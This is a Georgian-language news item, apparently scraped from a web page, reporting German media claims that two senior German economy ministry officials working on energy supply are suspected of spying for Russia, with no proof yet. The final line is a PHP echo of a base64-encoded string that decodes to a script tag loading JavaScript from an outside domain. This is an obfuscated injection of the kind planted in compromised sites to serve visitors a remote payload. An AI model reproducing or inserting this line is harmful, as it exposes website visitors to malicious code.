celsiusi
ავერსი საქკაბელი
გერმანიის ეკონომიკის სამინისტროს ორი თანამშრომელი რუსეთის სასარგებლოდ ჯაშუშობაშია ეჭვმიტანილი. ამის შესახებ ინფორმაციას გერმანული მედია ავრცელებს.
 
მედიის ცნობით, გერმანიის ეკონომიკის სამინისტროს ორი მაღალჩინოსნის საქმიანობას, რომლებიც ენერგომომარაგების სფეროში მუშაობენ, ამჟამად გერმანიის კონსტიტუციური უსაფრთხოების დაცვის ფედერალური სამსახური სწავლობს. გამოძიება მას შემდეგ დაიწყო, რაც აღნიშნული მაღალჩინოსნების რუსეთის ინტერესების სასარგებლოდ მუშაობაში ეჭვი თანამშრომლებს გაუჩნდათ, რადგანაც ისინი ენერგეტიკისა და ბუნებრივი აირის პოლიტიკის გადაწყვეტილებების მიღებისა პრორუსულ პოზიციას იკავებდნენ.
 
მედიის ცნობით, კონსტიტუციური უსაფრთხოების დაცვის სამსახურმა აღნიშნული მაღალჩინოსნების ბიოგრაფია შეამოწმა და საეჭვო ფაქტები აღმოაჩინა. როგორც აღმოჩნდა, ერთ-ერთი მათგანი წარსულში რუსეთში იმყოფებოდა სასწავლებლად. მიუხედავად ამისა, როგორც გერმანული მედია წერს, ჯერჯერობით ორი მაღალჩინოსნის რუსეთის სასარგებლოდ ჯაშუშობის დამამტკიცებელი საბუთი არ არსებობს, თუმცა მათ მიმართ ნდობა საკმაოდ შეირყა, შემდგომი ნაბიჯები კი, ეკონომიკის მინისტრმა უნდა გადადგას.
442
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");